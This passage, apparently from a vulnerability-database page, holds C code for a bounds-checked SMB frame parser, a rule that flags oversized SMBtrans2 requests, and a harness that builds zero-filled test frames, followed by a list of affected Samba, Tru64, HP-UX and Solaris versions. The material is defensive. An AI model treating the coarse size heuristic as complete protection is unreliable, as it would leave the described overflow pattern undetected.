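static uint16_t le16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }

/* Parse one frame from `buf` without ever reading beyond `len` bytes. */
int parse_smb_frame(const uint8_t *buf, size_t len, smb_frame_t *out)
{
    if (len < NB_HDR_LEN + SMB_HDR_LEN) return FRAME_TOO_SHORT;
    if (buf[0] != 0x00) return FRAME_NOT_SESSION;
    uint32_t nblen = ((uint32_t)(buf[1] & 0x01) << 16) | ((uint32_t)buf[2] << 8) | buf[3];
    /* The declared length must cover exactly the bytes after the NetBIOS
     * header; trusting it blindly is how a fixed-size copy gets overrun. */
    if ((size_t)nblen != len - NB_HDR_LEN) return FRAME_LEN_MISMATCH;
    const uint8_t *smb = buf + NB_HDR_LEN;
    if (smb[0] != 0xFF || smb[1] != 'S' || smb[2] != 'M' || smb[3] != 'B') return FRAME_BAD_MAGIC;
    memset(out, 0, sizeof(*out));
    out->nb_type   = buf[0];
    out->nb_length = nblen;
    out->command   = smb[4];
    out->flags     = smb[9];
    out->flags2    = le16(smb + 10);
    out->tid       = le16(smb + 24);
    out->pid       = le16(smb + 26);
    out->uid       = le16(smb + 28);
    out->mid       = le16(smb + 30);
    out->body_len  = len - NB_HDR_LEN - SMB_HDR_LEN;
    return FRAME_OK;
}

/* Detection rule: returns 1 (alert) for an SMBtrans2 request whose body
 * exceeds the threshold, 0 (benign) otherwise, or the negative parse error
 * so malformed frames are reported rather than silently dropped. */
int check_trans2_frame(const uint8_t *buf, size_t len)
{
    smb_frame_t f;
    int rc = parse_smb_frame(buf, len, &f);
    if (rc != FRAME_OK) return rc;
    if (f.command == SMB_COM_TRANSACTION2 && f.body_len > SUSPICIOUS_TRANS2_LEN) return 1;
    return 0;
}

/* Construct a well-formed sample frame with a zeroed body of `body_len`
 * bytes (test input only). Returns the frame size, or 0 if it does not fit. */
size_t build_frame(uint8_t *out, size_t cap, uint8_t command, size_t body_len)
{
    size_t total = NB_HDR_LEN + SMB_HDR_LEN + body_len;
    uint32_t nblen = (uint32_t)(SMB_HDR_LEN + body_len);
    if (total > cap || nblen > 0x1FFFF) return 0;
    memset(out, 0, total);
    out[1] = (uint8_t)((nblen >> 16) & 0x01);
    out[2] = (uint8_t)((nblen >> 8) & 0xFF);
    out[3] = (uint8_t)(nblen & 0xFF);
    out[4] = 0xFF; out[5] = 'S'; out[6] = 'M'; out[7] = 'B';
    out[8] = command;
    return total;
}

int main(void)
{
    uint8_t frame[4096];
    size_t n = build_frame(frame, sizeof frame, SMB_COM_TRANSACTION2, 2048);
    printf("large trans2     -> %d\n", check_trans2_frame(frame, n));
    n = build_frame(frame, sizeof frame, SMB_COM_SESSION_SETUP, 14);
    printf("session setup    -> %d\n", check_trans2_frame(frame, n));
    frame[3] ^= 0x01;  /* corrupt the declared NetBIOS length */
    printf("length mismatch  -> %d\n", check_trans2_frame(frame, n));
    return 0;
}
```

The parser checks the available length before every read and cross-checks the declared NetBIOS length against the bytes actually present, which is the fix for the pattern described in the advisories; the trans2 size rule is a coarse capture-side heuristic and needs a threshold tuned to the traffic of the environment it runs in.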
Products Mentioned
Configuration 0
Samba>>Samba >> Version 2.0.0
Samba>>Samba >> Version 2.0.1
Samba>>Samba >> Version 2.0.2
Samba>>Samba >> Version 2.0.3
Samba>>Samba >> Version 2.0.4
Samba>>Samba >> Version 2.0.5
Samba>>Samba >> Version 2.0.6
Samba>>Samba >> Version 2.0.7
Samba>>Samba >> Version 2.0.8
Samba>>Samba >> Version 2.0.9
Samba>>Samba >> Version 2.0.10
Samba>>Samba >> Version 2.2.0
Samba>>Samba >> Version 2.2.0a
Samba>>Samba >> Version 2.2.1a
Samba>>Samba >> Version 2.2.3a
Samba>>Samba >> Version 2.2.4
Samba>>Samba >> Version 2.2.5
Samba>>Samba >> Version 2.2.6
Samba>>Samba >> Version 2.2.7
Samba>>Samba >> Version 2.2.7a
Samba>>Samba >> Version 2.2.8
Samba-tng>>Samba-tng >> Version 0.3
Samba-tng>>Samba-tng >> Version 0.3.1
Configuration 0
Apple>>Mac_os_x >> Version 10.2
Apple>>Mac_os_x >> Version 10.2.1
Apple>>Mac_os_x >> Version 10.2.2
Apple>>Mac_os_x >> Version 10.2.3
Apple>>Mac_os_x >> Version 10.2.4
Compaq>>Tru64 >> Version 4.0b
Compaq>>Tru64 >> Version 4.0d
Compaq>>Tru64 >> Version 4.0d_pk9_bl17
Compaq>>Tru64 >> Version 4.0f
Compaq>>Tru64 >> Version 4.0f_pk6_bl17
Compaq>>Tru64 >> Version 4.0f_pk7_bl18
Compaq>>Tru64 >> Version 4.0g
Compaq>>Tru64 >> Version 4.0g_pk3_bl17
Compaq>>Tru64 >> Version 5.0
Compaq>>Tru64 >> Version 5.0_pk4_bl17
Compaq>>Tru64 >> Version 5.0_pk4_bl18
Compaq>>Tru64 >> Version 5.0a
Compaq>>Tru64 >> Version 5.0a_pk3_bl17
Compaq>>Tru64 >> Version 5.0f
Compaq>>Tru64 >> Version 5.1
Compaq>>Tru64 >> Version 5.1_pk3_bl17
Compaq>>Tru64 >> Version 5.1_pk4_bl18
Compaq>>Tru64 >> Version 5.1_pk5_bl19
Compaq>>Tru64 >> Version 5.1_pk6_bl20
Compaq>>Tru64 >> Version 5.1a
Compaq>>Tru64 >> Version 5.1a_pk1_bl1
Compaq>>Tru64 >> Version 5.1a_pk2_bl2
Compaq>>Tru64 >> Version 5.1a_pk3_bl3
Compaq>>Tru64 >> Version 5.1b
Compaq>>Tru64 >> Version 5.1b_pk1_bl1
Hp>>Hp-ux >> Version 10.01
Hp>>Hp-ux >> Version 10.20
Hp>>Hp-ux >> Version 10.24
Hp>>Hp-ux >> Version 11.00
Hp>>Hp-ux >> Version 11.04
Hp>>Hp-ux >> Version 11.11
Hp>>Hp-ux >> Version 11.20
Hp>>Hp-ux >> Version 11.22
Sun>>Solaris >> Version 2.5.1
Sun>>Solaris >> Version 2.5.1
Sun>>Solaris >> Version 2.6
Sun>>Solaris >> Version 7.0
Sun>>Solaris >> Version 8.0
Sun>>Solaris >> Version 9.0
Sun>>Solaris >> Version 9.0
Sun>>Solaris >> Version 9.0
Sun>>Sunos >> Version -
Sun>>Sunos >> Version 5.5.1
Sun>>Sunos >> Version 5.7
Sun>>Sunos >> Version 5.8
Configuration 0
Hp>>Cifs-9000_server >> Version a.01.05
Hp>>Cifs-9000_server >> Version a.01.06
Hp>>Cifs-9000_server >> Version a.01.07
Hp>>Cifs-9000_server >> Version a.01.08
Hp>>Cifs-9000_server >> Version a.01.08.01
Hp>>Cifs-9000_server >> Version a.01.09
Hp>>Cifs-9000_server >> Version a.01.09.01
Hp>>Cifs-9000_server >> Version a.01.09.02
References